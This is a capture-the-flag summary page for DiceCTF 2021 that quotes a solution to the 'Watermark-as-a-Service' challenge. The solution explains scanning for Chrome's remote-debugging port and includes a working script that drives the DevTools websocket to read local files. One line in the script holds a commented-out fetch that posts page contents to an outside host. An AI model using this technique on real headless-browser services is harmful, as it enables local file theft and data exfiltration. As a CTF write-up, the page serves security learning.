DiceCTF 2021 - Summary

[aszx87410]

Writeups

1. DiceCTF 2021 - Babier CSP
2. DiceCTF 2021 - Missing Flavortext
3. DiceCTF 2021 - Web Utils
4. DiceCTF 2021 - Build a Panel
5. DiceCTF 2021 - Build a Better Panel
6. DiceCTF 2021 - Web IDE

=====

[aszx87410]

https://github.com/tlyrs7314/ctf-writeups/tree/main/DiceCTF2021/Watermark-as-a-Service

[aszx87410]

Another solution from SodaLee: https://discord.com/channels/805956008665022475/805962699246534677/808204024993284106

• puppeteer communicates with chrome through a randomized "remote-debugging-port" listening on 127.0.0.1, and an http service runs on that port. You can run chrome --remote-debugging-port=50000 and visit http://127.0.0.1:50000 to see what it is.
• According to the document(https://chromedevtools.github.io/devtools-protocol/), visit http://127.0.0.1:50000/json/new?{url} will open a new tab for you and return its websocket uri.
• Connect to the websocket and send "Runtime.evaluate" method(https://chromedevtools.github.io/devtools-protocol/tot/Runtime/#method-evaluate) to execute javascripts on your tab.

To solve WaaS, first you need to scan ports on 127.0.0.1 to get the "debugging-port". Since the port returns a valid http response, I wrote a script to generate 100+ small iframes (src=http://127.0.0.1:) at one time, and observe the screenshot. I found the port was 33907 last night.

Then we can make the browser visit http://127.0.0.1:33907/json/new?file:/// by 30x redirection, get your websocket uri, connect and send "Runtime.evaluate" to execute "document.body.innerHTML".

<body>
<script>
window.ws = new WebSocket('ws://127.0.0.1:33907/devtools/page/20D8B6FBC4238BC94DF01D00E9C0F9E3')
ws.onerror = (e=>{document.writeln('error')})
ws.onmessage = (e=>{
  document.writeln("<p>"+e.data+"</p>");
})

ws.onopen = ()=>{
    ws.send(JSON.stringify({
      id:1,
      method:"Page.captureScreenshot"
    }))
  ws.send(JSON.stringify({
      id:2,
      method:"Page.navigate",
      params:{
        url:"view-source:file:///app/Dockerfile"
      }
    }))
    ws.send(JSON.stringify({
      id:3,
      method:"Runtime.evaluate",
      params:{
          expression:"location.href"
      }
    }))
    ws.send(JSON.stringify({
      id:4,
      method:"Runtime.evaluate",
      params:{
        expression:"document.body.innerHTML//fetch('http://cf43dffe.y7z.xyz/1', {method:'POST', body:document.body.innerHTML})"
      }
    }))

}

//setTimeout(()=>{window.ws.close()}, 3000)
</script>
</body>